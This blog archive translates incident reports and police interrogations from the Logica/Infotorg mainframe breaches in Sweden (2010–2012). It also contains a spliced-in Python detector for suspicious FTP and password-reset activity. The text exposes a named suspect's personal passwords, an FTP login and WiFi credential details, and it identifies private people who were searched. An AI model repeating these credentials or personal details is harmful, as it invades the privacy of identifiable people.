(Monique Wadstedt was the lawyer which represented the American entertainment industry in the Pirate Bay trial).

Applicate representatives have been informed by IBM specialists (hired by Logica) that investigated Logica’s mainframes and systems and found that there were over 20 years old user accounts remaining in the permission systems.
Regarding the Police connections to Applicate’s information systems they state that the Police has its own encrypted connection between Applicate’s mainframe and the Police’s mainframes.

After a detailed review of the situation Applicate has found that somebody downloaded circa 10 000 social security numbers belonging to people that had protected identities 2007-01-29. These numbers were extracted out of the system to be put in and complete the company services that Applicate offers. Normally only the police can access the personal information that is connected to these numbers but it is not unlikely that a user with superuser permissions would be able to access and connect this information with accurate data.

Applicate has found that there have been searches made on people living around Borlänge, Ludvika and Smedjebacken. Queries have also been made on people in other parts of the country.

Moreover it has been detected that the intruders, through searching for the organisation number of the National Police Agency, have searched for vehicles owned by the National Police Agency.

Other search queries have also been made.

The intruders have also downloaded the SPAR database which also includes historical data 4 years back in time.

Upon examining outgoing traffic Applicate can state that traffic has gone to at least two IP addresses owned by Cogetel in Phnom Penh in Cambodia. Applicate has also detected exports to IP addresses in Germany and various other countries in Europe. Information has been downloaded using ISP Bahnhof and Tele2 mobile broadband with a prepaid SIM-card.

Stockholm 2012-03-19

P*d*r Q**st

Logica, National Special Event: Morgan (part 3)

May 3rd, 2013 by qnrq

[image: infotorg_intrusion]
Translated summaries of Logica security incident reports.

Logica Status report 2010-02-19, security incident

29th January 2010

Data is transferred over FTP, large datasets are copied to an unknown address. The user identity that was used had at the time correct permissions and a valid password. The account used the NYTTPW (NEWPW) function to retrieve a valid password.

Logica has found that this account hasn’t been modified since September 2008, as far as RACF logs go.

2nd February 2010

An unauthorized person manages to log into an account in TPX, which isn’t protected by RACF. This account can be used to take over other active sessions and the attacker has that way hijacked another user’s permissions fully.

Besides the unprotected account the person has had full administrative permissions in the TPX system and used it for data manipulation. Due to RACF protection it hasn’t meant any risk for systems in the background.

The unprotected user identity in TPX has been set up this way since the last installation which was made circa one year ago. This is although the first known time that somebody has used the possibility to use this account to take over another user’s session.

The data stolen from the system on the 29th January contained a list of user identities without password protection. It is possible that this information made it possible, although it hasn’t been proven. The alternative being that the attacker knew beforehand.

4th February 2010

The possibility to log into TPX without RACF control was stopped. After this date there have not been any successful attempts to take over an active session in TPX.

FTP to SYS19 and SYS3

On 29th January 2010 SEMA290 logged in through FTP and started retrieving files:

2010-01-29 20:39:21 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 20:59:42 SYS19 Resume password made through user E484RACF using routine NYTTPW
2010-01-29 22:58:28 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 22:58:28 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 22:58:32 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 23:02:46 SYS19 Invalid password, FTP
2010-01-29 23:17:48 Connects through FTP and retrieves a large amount of datasets and files.
2010-01-29 23:37:39 SYS3 Failed login attempt through FTP. Fails since the user is revoked.
2010-01-29 23:38:50 Failed login attempt due to revoked user.
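As an added example that is not part of Logica’s report, the detection logic a defender would want for the timeline above, and for the shared-account problem between partitions described later in the report: a small parser over constructed log lines (the key=value layout is assumed for illustration, not RACF’s real SMF record format) that flags a password reset through NYTTPW followed by a successful FTP login, a user rejected as revoked on one system but accepted on another, and bulk dataset retrieval after login.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, not the real RACF/FTP log from the report. The
# SEMA290 events mirror the report's 29 January 2010 timeline; WMSTOTT is a
# benign control case. Dataset names are placeholders.
SAMPLE_LOG = """\
2010-01-29 20:39:21 SYS3 user=SEMA290 event=FTP_LOGIN result=FAIL reason=REVOKED
2010-01-29 20:59:42 SYS19 user=SEMA290 event=PASSWORD_RESUME routine=NYTTPW by=E484RACF
2010-01-29 22:58:28 SYS3 user=SEMA290 event=FTP_LOGIN result=FAIL reason=REVOKED
2010-01-29 23:02:46 SYS19 user=SEMA290 event=FTP_LOGIN result=FAIL reason=INVALID_PASSWORD
2010-01-29 23:17:48 SYS19 user=SEMA290 event=FTP_LOGIN result=OK
2010-01-29 23:18:05 SYS19 user=SEMA290 event=FTP_RETR dataset=DEMO.DATA.A
2010-01-29 23:18:09 SYS19 user=SEMA290 event=FTP_RETR dataset=DEMO.DATA.B
2010-01-29 23:18:14 SYS19 user=SEMA290 event=FTP_RETR dataset=DEMO.DATA.C
2010-01-29 23:37:39 SYS3 user=SEMA290 event=FTP_LOGIN result=FAIL reason=REVOKED
2010-01-30 08:00:00 SYS19 user=WMSTOTT event=FTP_LOGIN result=OK
2010-01-30 08:00:30 SYS19 user=WMSTOTT event=FTP_RETR dataset=DEMO.DATA.A
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) (.*)$")

# Tunable thresholds (assumed values for the example).
RESET_WINDOW = timedelta(hours=6)   # reset followed by FTP login within this window
BULK_THRESHOLD = 3                  # datasets pulled in one session before alerting


def parse_line(line):
    """Parse one 'timestamp system key=value ...' line into a dict, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, system, rest = m.groups()
    fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
    fields["system"] = system
    return fields


def parse_log(text):
    return [ev for ev in (parse_line(l) for l in text.splitlines()) if ev]


def detect(events):
    """Return a list of alerts, each a dict with a 'rule' name and context."""
    alerts = []
    last_reset = {}                  # user -> time of last password resume
    revoked_on = defaultdict(set)    # user -> systems that rejected the user as revoked
    retrievals = defaultdict(int)    # (system, user) -> datasets pulled since login
    for ev in events:
        user, system, kind = ev["user"], ev["system"], ev["event"]
        if kind == "PASSWORD_RESUME":
            last_reset[user] = ev["ts"]
        elif kind == "FTP_LOGIN" and ev.get("result") == "FAIL":
            if ev.get("reason") == "REVOKED":
                revoked_on[user].add(system)
        elif kind == "FTP_LOGIN" and ev.get("result") == "OK":
            retrievals[(system, user)] = 0
            reset = last_reset.get(user)
            if reset is not None and ev["ts"] - reset <= RESET_WINDOW:
                alerts.append({"rule": "reset_then_ftp", "user": user,
                               "system": system, "ts": ev["ts"]})
            # Same userid revoked on one partition but live on another: the
            # shared-account exposure the report describes.
            other = revoked_on[user] - {system}
            if other:
                alerts.append({"rule": "revoked_elsewhere", "user": user,
                               "system": system, "revoked_on": sorted(other),
                               "ts": ev["ts"]})
        elif kind == "FTP_RETR":
            retrievals[(system, user)] += 1
            if retrievals[(system, user)] == BULK_THRESHOLD:
                alerts.append({"rule": "bulk_retrieval", "user": user,
                               "system": system, "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(a["ts"], a["system"], a["user"], a["rule"])
```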

Tests run with FTP, mirror environment

Logins through FTP against SYS19 have been done with the following userids:

SEMA290
NIXTE22
ITP0257

Has only tested login and listing the entire master directory.

Tests run with FTP, production environment

The following userids have been tested:

WMSTOTT

Has only tested to login and listing the entire master directory.

Summary

Tests have been made in the mirror environment, SYS19, to determine what kind of info can be retrieved over FTP.

All datasets in the USS part under TSO can be listed. This reveals some information e.g. usernames even though the libraries are protected via RACF.

Conclusions

Why it could happen

Userid and the possibility to change passwords for a couple of demo users become known to an unauthorized person. This possibility is later used to log into and gather data from the web interface. The same userid is later used for connecting over FTP to SYS19 and gathering information.

It’s possible to sign in through FTP using demo users because RACF users in the environment are automatically assigned a UID at login. UIDs are assigned to enable the user to use resources under USS (ftp, telnet, sftp, webserver etc).

Users that don’t need these functions should not be assigned a UID.

Since the purpose of the system is to be accessible from anywhere it is possible to log in with FTP given a userid and password.

TPX logins via userid without specifying passwords have been possible due to a modified parameter in TPX. This parameter was modified in connection with the production environment being upgraded on 8th February 2009. This was reconfigured by a job run on SYS3 and SYS19, job name ADMIN.

Report extern deliveries, 2012-03-24

7th March
Applicate and Logica discover unusual activity in the mainframe environment. After a small group of people did a quick investigation during the night they block specific accounts in the system. In the morning the group is expanded and additional managers are notified. On the 13th March the investigation reveals that the activity has occurred since the 25th February 2012.

1th March
Logica calls in IBM’s international incident investigators and security specialists. On the 19th March the picture is so clear that a police report is handed from Applicate to the Security Service.

The intrusions are partially made over existing file transfer services using the FTP function, partially via interactive logins via ordinary remote control functionality, and finally via the attackers’ own placed backdoors. The intrusions have often occurred in combination with large data retrievals from the systems. Additionally intrusions and abuse have been done in Applicate’s web services. The abuse has amongst others consisted of unauthorized credit checks.

The investigation finds that there are two points of intrusion, like shared accounts between the mainframe partitions, which allows the attackers to access data stored on both partitions in the cases where the attackers have been lucky to retrieve one of these accounts. Which they unfortunately did.

Estimated 10000 files/datasets have been retrieved from SYS19 by unauthorized people. Estimated 600 files/datasets have been retrieved from SYS3 by unauthorized people. The files and datasets that were retrieved contain various types of company information, including a list from 2007 over social security numbers with filename “E897.SPAR.SKYDD”.

Over 120 000 accounts were retrieved from the user database RACF. Retrieval has been done of user information, by which the investigation from forgotten files could conclude that important password information was missing. However it can’t be excluded that such information has leaked. Large amounts of these accounts have been blocked or revoked. Circa 70000 active customer accounts remain today in the system as preventative actions and cleaning continues.

Specifically interesting to note regarding the accounts:

– The first account that was verified cracked and used 25th February belongs to a file transfer job from the Swedish parliament. How somebody gained access to this account is still unknown.
– One of the accounts frequently used by the attackers originally belonged to Monique Wadsted, one of the lawyers hired by the entertainment industry in the so called Pirate Bay trial.
– Multiple accounts used, including Wadsted’s, have been manipulated in the RACF database to increase permissions. The work of both the incident and the investigation continues.

Status on whether the intrusion is stopped or continues

The attack surface has narrowed through various technical limitations.

Intrusion attempts to SYS19 are handled by whitelisting FTP traffic from approved IP addresses and filtering protocols previously used in the attacks (telnet traffic and traffic on port 443). Misc traffic that hasn’t been proven legitimate has been filtered.

Intrusion attempts to SYS3 are handled by whitelisting traffic to FTP and filtering illegitimate traffic.

All system administrator accounts have changed passwords, compromised administrator accounts are replaced.

Last found intrusion in SYS3 occurred on 23rd March through FTP and telnet. Last found intrusion on SYS19 occurred on 16th March through telnet.

Continuous intrusion attempts happen targeting web services based on the list of usernames stolen from SYS19.

Detailed information regarding known leaked information

Description of contents in the files copied from respective system.

SYS19
– SPAR (Statens Person och Adressregister) information, list of social security numbers for citizens born 1964 and later.
– Infotorg invoice information – Invoices, amounts of transactions per customer.
– PI (logins on Infotorg) – Files sent to LIME (CRM). All information regarding customers in Infotorg and their permissions.
– Infodata (Postal service) – Adress matching
– Infotorg (PWC) – Specification of project marking for invoices
– The police – 2 million social security numbers, only.
– Applicate (Radiotjänst) – Invoice information
– Infotorg/Infodata/Police – Invoice information, transaction type and amounts.
– Police – Transaction statistics from 2006
– Infodata – Three datasets where the file name contains the text “protected”. The datasets are from year 2007. 10 793 social security numbers in total, a copy and two originals have been stolen.
– Applicate (mixed customers) – Invoice statistics
– Infodata – datasets containing social security numbers in relation to eachother
– Infotorg – BASUN (company information from SCB). Base information, names, legal form, company size etc.

SYS3
– FLISTEST – Handelsbanken’s invoices to their customers 2006 and 2007

– According to the bailiff agency circa 40 cleartext files containing customers and debtors that are normally sent to the UNIX systems have been copied from SYS3. The files contain social security numbers, debts, who the person owes money. The files also contain information about debts for people with protected identities.
– Payment files for Swedbank and signet for signing payment files have been copied from SYS3, the signet has been replaced.
– The Cobol source code for the program Navet has been copied together with KFM’s Navet certificate. The code was used by the intruder to find vulnerabilities in the Navet application. The application is however only available from the tax agency’s network and not publicly available.

Information about how the escalation was made during the intrusion

Applicate and Logica found on the 7th March that SEMCICA3 in SYS19 had an unusually high CPU usage, many transactions were running by a questioned user. The activity was considered unauthorized and a security incident was stated on the 8th March wherein an investigation began. (IM3107818).

16th March
Applicate found that the attacker established more access to the system and calls for a crisis meeting. Logica establishes Major Incident Manager and calls in specialist competence from IBM.

Applicate files a report at the Security Service on 19th March.

Intrusion is found in SYS3 whereas Logica contacts the Security Service with a report 21st March.

Information about accounts used at information retrieval

25th February
The first known account used was an account from the Swedish Parliament (AVIY356). This user has through zOS and USS begun downloading approximately 400 datasets and files from Logica. It has been found that a number of accounts have been used over time and that many of them have been manipulated to receive special and superuser permissions in the systems.

Which sort of traffic was queried from Dalarna

An investigation has been made on a selection of search queries done on Infotorg. As previously mentioned there have been searches done on Jim Keyzer, Gottfrid, PRQ, Police registered cars in the car registry etc.

Below follows a short selection with explanations:

LN: Swedish representative for space project Cospar

JE: Could be one of the attackers searching for himself (?)

MB: Police who took action against filmmaker and forced deletion

Håkan Marklund: Robinson participant (Swedish TV show)

Mikael Persbrandt: Actor

RÅ: Appears to be a technician certifying himself

LB: Cat owner and kindergarten teacher, possibly in Norrtälje

ET: Charged for knife stabbing in Ludvika

AB: 17 year old blogger

Reflection:
Young people have probably received login details for Infotorg from the more competent main actors. These youngsters have searched for famous people, a blogger and people in Ludvika/Smedjebacken and have most likely not had the slightest idea about the eventual risks of the searching. Probably anchored in Ludvika/Smedjebacken.

Other affected organisations

After going through retrieved datasets it has been found that affected organisations can be limited to:

– Logica
– Applicate
– Tax agency
– Bailiff agency

Logica, National Special Event: Morgan (part 2)

May 3rd, 2013 by qnrq

Applicate incident description

[image: bisnode_overview]

7th March 2012

An Applicate employee receives a warning message at 7 AM saying that there is unusual activity in the mainframe environment; one of the InfoTorg users is trying to access a large amount of files that the employee administrates and the user account isn’t authorized to view.

The employee contacts Applicate’s security manager around 7:30 AM explaining that the user account is trying to access the circa 10 000 files which the employee administrates.

The security manager contacts Applicate’s operations manager informing him what has happened. The operations manager in turn contacts Applicate’s CEO to report the findings. Applicate forms a team to handle the incident. The team consists of Applicate’s CEO, the security manager and operations manager.

The Infotorg account which is being used turns out to be owned by one of the Infotorg sales people and the account is locked. The sales person is contacted to ensure that the login details are used properly and hasn’t been handed over to third party.

The operations manager contacts Logica to book a meeting for the following day.

8th March 2012

The Applicate incident team has the booked meeting with Logica around 9:30 AM; Logica’s customer manager and Logica’s security manager are present. Details are given to Logica during the meeting.

9th March 2012

It is discovered that multiple user accounts have been used in a strange and improper way. IP addresses are traced to various countries, including Cambodia, from where Infotorg’s customers usually don’t connect.

Applicate’s CEO contacts Logica’s CEO with information that Applicate suspects that there is an occurring security incident affecting Logica. Logica assigns Applicate a person who helps Applicate block suspicious IP addresses that are used to access breached accounts.

10th and 11th March 2012

Applicate’s incident team analyzes logfiles and suspected IP addresses and blocks IP addresses and user accounts that are believed to be used in improper ways.

12th March until 20th March 2012

Daily meetings are held between Applicate and Logica. Applicate’s incident team continues analyzing logs and blocking suspicious IP addresses and user accounts. It is noticed that the amount of user accounts being used improperly keeps escalating. On the 19th March Applicate’s incident team contacts the police.

21st March 2012

8:20 AM Logica informs Applicate that unauthorized logins have been made not only in SYS19, the machine dedicated to Applicate and Infotorg, but also in SYS3. It is also revealed that somebody has accessed a system wide admin account, a NUS, that grants nearly full permissions to SYS3 and SYS19. Around 14:30 Applicate’s incident team finds that sensitive information owned by the tax agency has been downloaded by the attackers. The security managers from the tax agency and bailiff agency are contacted. At 16:38 the unauthorized NUS user has a failed login attempt and around 20:00 intrusion attempts are detected from new IP addresses.

23rd March 2012

Starting this date the investigation proceeds with the Swedish National Police Agency and Activity Protection. Logica, IBM, Applicate/Infotorg and KPMG begin work with affected government agencies and provides them logfiles. Applicate/Infotorg begins modifying the infrastructure to prevent future attacks of this sort. Intrusions end in April 2012.

Cost

Applicate hired consultants for in total 2 000 000 SEK to work with the incident. Infotorg changed its routines for password management in its services, they changed the policy to require more complex passwords. To achieve this Infotorg hired consultants and existing staff had to work overtime. In total Infotorg has spent up to around 2 200 000 SEK to achieve this.

In addition to these costs management staff has spent time corresponding to circa 440 000 SEK. Key people in Bisnode have also had to spend time on controlling logging, following up credit investigations and troubleshooting etc. The costs for this are estimated to circa 275 000 SEK.

In total the claimed damage caused to the Bisnode group is estimated to be circa 4 915 000 SEK.

The intrusion in Applicate was reported by Axex AB, a security and risk management company. They are most likely the consultants that were hired for 2 000 000 SEK to gather evidence. There is therefore reason to believe that Axex has conducted surveillance on people living in Cambodia as part of the investigation.

Logica, National Special Event: Morgan (part 1)

May 1st, 2013 by qnrq

Logica discovered that their systems had been breached 6th March 2012. 16 days later they filed a report to the Swedish police. The extent of the breach was unknown and it was assumed at the beginning that all information handled by the company had leaked. It was confirmed pretty soon that the social security numbers of over 10 000 individuals with protected identities had been stolen from the mainframes.

This writing is split into multiple parts, links to following parts will be added when published in the future.

The investigation work was found to be outside the Security Police’s scope and RPS (national police) initiated the work. All affected staff in national police forces, the tax agency and bailiff agency received information about the incident. A big meeting was held 23rd March to organize the investigation, approximately 40 people were in the meeting. The work was divided into smaller groups where each company and governmental agency had at least one representative in each group.

The coming weeks a large portion of the involved staff had their hands full. The security service assisted the national police agencies. The incident was considered so serious that on 28th March the head police chief issued a national special event in accordance with Ordinance (1989:773) with instruction to the national police to coordinate the police tasks and cooperate with external governmental agencies.

The Swedish police did its investigation at a flat rate price of 920 kr/hour, the same price the police charges for covering sports events. The calculation below is only based on the work that RPS spent on “handling the incident and securing that the information used in the investigation is trustworthy” (sic).

RPS Activity protection: 1 273 599,00 kr
RPS Communications department: No data
RPS/RKP: 63 480,00 kr
RPS/PVS: 713 000,00 kr
RPS System owners: No data
SÄPO (Security Service): 2 300 000,00 kr
HK Management: 36 800,00 kr
PVS Management staff: No data
Remaining work (estimated): 326 792,00 kr
Total: 4 533 823,00 kr

“Virtually all communication between suspects has occurred or is occurring through the IRC channel #hack.se. In there people are relatively openly discussing hacking and “everybody” knows what is happening, is involved to some extent or have an overview of what is going on. (sic)”

Fishing in Ludvika

[image: dirox_map]

By analyzing logfiles from Logica and subsequent IP tracing it was found that multiple IP addresses pointed to a relatively small geographical area in Ludvika, Sweden. There was therefore reason to suspect that one and the same person had used multiple wireless networks. Multiple queries done on Infotorg’s web interface could be connected to diROX, suspect “MG”, through internal reconnaissance.

On suspect MG’s cellphone forensics personnel found the Infotorg app installed, which should only be available for companies, organizations and governmental agencies that are Infotorg customers. When forensics personnel started the app the username “KURS104” was saved. MG’s cellphone also contained an installed portscanner app, which when started contained “ftp.infotorg.se” prefilled in the host field.

[image: dirox_phone]

On an SD-card found in MG’s cellphone the forensics personnel found, in the path /u1/Ubuntu One/Linux/Hacking/, the programs reaver_v1.4 and wpstools, which can be used to break into WiFi networks. In the Keys folder they discovered folders named wep, wpa-captures, wpa-knackt and wpa-oknackt. In wpa-knackt they found text documents 54-E6-FC-BE-80-9A_Backe.txt and A0-21-B7-7A-3E-7E_LINNEA_Network.txt containing identification details and login credentials to WiFi networks that had been used to access Infotorg/Logica servers.

[image: ubuntu_one_map_dirox]

Much of the contents of the SD-card was also retrieved from an FTP account on Passagen.se and Ubuntu One, with nicknames being dirox and e-mail address [email protected] In a computer seized by the police from diROX they found browsing history for his ftp.passagen.se account, using password qw97p48z

Screenshots seized from diROX’s Ubuntu One cloud storage show somebody was signed into hacked Infotorg accounts at the same time as browsing social media sites like Facebook and Helgon while chatting on MSN and reading Gmail account luciddream:

[image: infotorg_screen]

Large amounts of files with usernames and passwords for Infotorg accounts were discovered in MG’s possession along with multiple files containing passwords to hacked WiFi accesspoints located around his address. On his passagen.se FTP account the investigators found large amounts of logfiles containing communication with tLt. On MG’s Ubuntu One account they found a large amount of datasets matching the data that had been downloaded from Logica mainframes. There were also traces of intrusion targeting Logica and Infotorg dated 2010, 2011 and 2012. Both connections to Logica mainframes and queries in Infotorg.

Hearings

15th April 2012
MG was heard in regards to being suspected of hacking alternatively assisting hacking between 25th February and 15th April 2012. MG is suspected of illegally accessing and searching in Logica hosted Infotorg registries.

MG is informed about his right to have a lawyer present but chooses to be heard alone. MG denies crime. He states that he has signed into Infotorg from his own or his girlfriend’s computer a few times. At these times he has found some passwords on the Internet that other people have posted. MG states that he has used his own security number to log in using these passwords. MG considers himself to be pretty good at handling computers. His girlfriend’s name is LB and she owns an IBM laptop protected by the password phrase FITTJUV.

MG is asked if he really doesn’t want a lawyer present and after thinking for a while says that perhaps that would be a good idea. MG requests Björn H. The hearing is cancelled.

15th April 2012, 14:00 PM
Two police officers transported diROX from Borlänge to Stockholm. The trip took 2.5 hours and the three of them had a social conversation during the whole time. diROX was disappointed over his life and thought that he had let his parents and his girlfriend down. diROX asked what kind of punishment he would be facing for hacking and stated his girlfriend’s innocence. He also said that he had found passwords on the Internet and tried if they worked. According to himself he had only queried information about himself. He added that “there are more people involved, not only him.”

17th April 2012, 14:10 PM

MG admits crime as soon as they are presented. He says that he has only been logged into Infotorg’s website. He states that he has Linux experience, not very good at networking and has no programming knowledge. Interrogators ask why he has been googling about Infotorg, MG replies that he hasn’t been looking for anything specific. MG says that he found login credentials on a Swedish forum that he forgot the name of. He claims to have tried around 5 accounts and that he doesn’t have anything on his computer after it’s been lost at reinstall done “the other day”.

MG says that he has been logged into Infotorg “maybe a week ago” and has only been looking up himself and his friends in the registry. MG says that he has been acting alone and doesn’t know if he has shared the information with anybody else.

Interrogators bring up his .bash_history file where he is grepping a file named log.txt for the string Ludvika. Interrogators bring up that his girlfriend has stated in hearings that he can hack into wireless networks, that MG accesses access points in the area. He names his passwords as being fittjuv and apa123 on his computers, apa123 being his most commonly used password.

16th May 2012, 09:00

MG is informed that the suspicions have been extended from 25th February 2012 – 15th April 2012 to January 2010 – 15th April 2012. MG says that he doesn’t think so and denies. When asked if he’s denying both Logica and Infotorg he responds that he possibly may have been illegally accessing Infotorg since 2010. Interrogators continue asking about the .bash_history file found on MG’s girlfriend’s computer which contains data about Infotorg. MG doesn’t know anything about it, except the name Infotorg. MG denies knowledge about a memory card containing a folder called Infotorg, which his girlfriend has said in a hearing belongs to him. He also denies using cloud services and the hearing is ended shortly after.

14th June 2012

The interrogator asks if MG has gotten the Infotorg accounts from somebody; MG responds “unfortunately no” and continues stating that he just finds them, but doesn’t want to say where. The interrogator asks if MG knows the IRC channel #hack.se, which he does; he has been there before but doesn’t know how long ago or what nickname he used. The nickname diROX sounds familiar to MG, but he says it is not his and he doesn’t know him. MG is asked about KS (suspect #2) and the IRC nickname KS used in #hack.se. The interrogator tells MG that KS is also detained as part of the investigation of the case.

The interrogators explain that they have found material from Infotorg and Logica on computers seized from KS. MG denies that KS has received such data from him. The interrogator says that KS has said that MG is diROX; MG denies it and says that he doesn’t think he has used that nickname, but he has seen it. MG doesn’t know if it is his nickname or somebody else’s. The interrogator tells him that they have seen on his computers that MG is in fact diROX.

The interrogator continues listing nicknames from #hack.se, which MG confirms he has seen and spoken to. The interrogator asks if MG recognizes the nickname Anakata. MG says that Anakata is Gottfrid from The Pirate Bay. The interrogator asks if he knows TiAMO, whom he knows from The Pirate Bay and #hack.se, but they haven’t spoken.

The interrogator asks what they talk about in #hack.se, and says that KS has said in a hearing that the latest topics have been the hacking of Logica and Infotorg. The interrogator explains that KS has named MG as connected to the attacks on the two named targets. MG denies that he is involved or that he knows anybody who is.

18th June 2012

Interrogators clarify that MG is suspected of retrieving data from Logica mainframes and manipulating RACF. MG doesn’t understand. Interrogators ask about RACF and talk about traces they have found in MG’s possession. MG doesn’t know anything about RACF and denies retrieving information from the mainframes. MG doesn’t understand anything except that Logica has been breached.

Interrogators continue by asking if MG knows about Infotorg, which he does, but he has no idea who runs it. Interrogators ask if he knows what a mainframe is; MG explains that they are computers that can handle quite a lot.

Interrogators clarify that MG is suspected of visiting Logica mainframes, manipulating RACF and doing unauthorized queries in Infotorg. MG admits the Infotorg parts and knows that he isn’t allowed to do what he has done using other people’s accounts.

Interrogators raise the third suspicion, that MG has illegally broken into and used his neighbors’ WiFi networks, which MG admits he has. Interrogators explain that MG’s IP address has been found in Logica mainframe logs along with his neighbors’ IP addresses.

After the interrogators continuously state that suspect KS has named MG as diROX, and that the nickname is found on MG’s computers and in his neighbors’ network activity, he says that maybe he has used that nickname sometimes. MG admits that he has received several hundred Infotorg accounts from somebody on IRC but doesn’t want to say who gave them to him, although he knows who did.

MG denies that he has downloaded any data from any intrusion except saved queries he has done on his friends in Infotorg. The interrogator asks if those friends of his could have been Hells Angels members, to which MG responds “maybe”.

The interrogator says that he finds it strange that MG is admitting some things but not others and asks why that is. MG replies that he hasn’t done some of the things. The interrogator continues, stating that they have data proving otherwise, which MG finds strange and doesn’t believe. When asked if MG thinks they are bluffing, he responds yes. The interrogators explain that there is more than they have told him, such as logs from CSN and IRC logs from #hack.se.

“We suspect or we strongly believe that you are not alone in this, we think that there are many more involved. The problem is that we can’t prove it. We only have what we have from you, so to speak.”

After chatting about his WiFi hacking activities the interrogators start pressuring him to reveal the identity of the person who supposedly gave the Infotorg access to MG, stating that KS has said that MG is diROX and that diROX is somebody involved in these matters. MG doesn’t know, and the interrogators continue by verifying that MG admits two out of three charges. MG states that he knows somebody who has hacked the Logica mainframe on which Infotorg is run, but doesn’t know if they acted alone or how it happened.

“You don’t know. Have you been like a little hangaround, maybe you haven’t been allowed to be in the gang and haven’t really…?”

MG says that he thinks so. When asked he replies that he didn’t give anything in return for the data that he has received from an unnamed somebody or somebodies. He doesn’t know if it’s a criminal gang that has breached the mainframes or a loner.

JP: No… But, as long as you don’t want to tell it’s a little… then there are problems. We can’t… Because we know a lot of things that we can’t or don’t want to tell, and if you don’t want to tell then we don’t get anywhere with this. Is there anything you would like to tell us that you think is important for us, without revealing too much?
MG: I don’t know, I can’t think of anything.
JP: It’s very sad when you can’t… that you can’t or don’t want to tell. That’s how it is. It would be better for yourself to say and…
MG: That I… (inaudible)
JP: But why so to speak?
MG: No, but then I will have problems later.
JP: Oh. So you’re afraid that they will retaliate?
MG: Exactly.
JP: OK. But how do you think it’s going to look later when you… when you’re released and this goes to court and we put up all the evidence? Then you will start to think anyway about what you said or why you were so careless as to leave chat…
MG: Because of this chat?
JP: No, but why… We have found your chatlogs.
MG: OK.
JP: You don’t think that these people that you are afraid of will start to consider anyhow?
Lawyer: That is not an appropriate question to ask!
JP: Do you want to ask a question or what are you saying?
Lawyer: No, but I think it’s inappropriate that you formulate your question that way and put him in a corner saying he’s risking retaliation anyway. The court says that you can’t force somebody to say something that they don’t want to say if they are afraid of retaliation. Your question formulated that way (inaudible) and I don’t think that is an appropriate question.
Fhl: Yes, it is noted. But, we can ask that question anyway, I think. Do you have any comments on it then?
MG: No…

6th November 2012

MG voluntarily chooses not to have any legal defense at this hearing.

MG is asked what nicknames he’s using on IRC, he responds that he has difficulties with his memory sometimes. MG remembers that he used many different nicknames, among others diROX and Matte76.

Interrogators ask about Gottfrid Svartholm Warg. MG replies that he knows GSW and that they have met in person, but doesn’t remember how long ago. MG says that GSW has said on IRC that he was in Cambodia, and that he left after The Pirate Bay conviction. MG says that he doesn’t remember the nickname GSW used when they spoke on IRC.

Interrogators ask what computer knowledge GSW has. MG replies that GSW is very smart and knowledgeable. MG considers himself good at computers but states that GSW beats him in computer science.

MG is informed about IRC conversation logs. MG is shown chat traffic retrieved from diROX’s Passagen.se FTP account between the aliases diROX and tLt, from 2012-03-10 16:54–16:56 and 2012-03-25 21:11–21:15, and is asked to comment on this log. MG spontaneously replies that tLt is Gottfrid Svartholm Warg. He remembers it clearly. He also says that the second conversation, where tLt talks about Infotorg accounts, proves that MG has always been right in what he has been trying to explain: that he himself doesn’t have anything to do with these accounts. MG states that he has only tried to log in to a few of those accounts, but that other people have breached the systems. MG doesn’t want to name those individuals.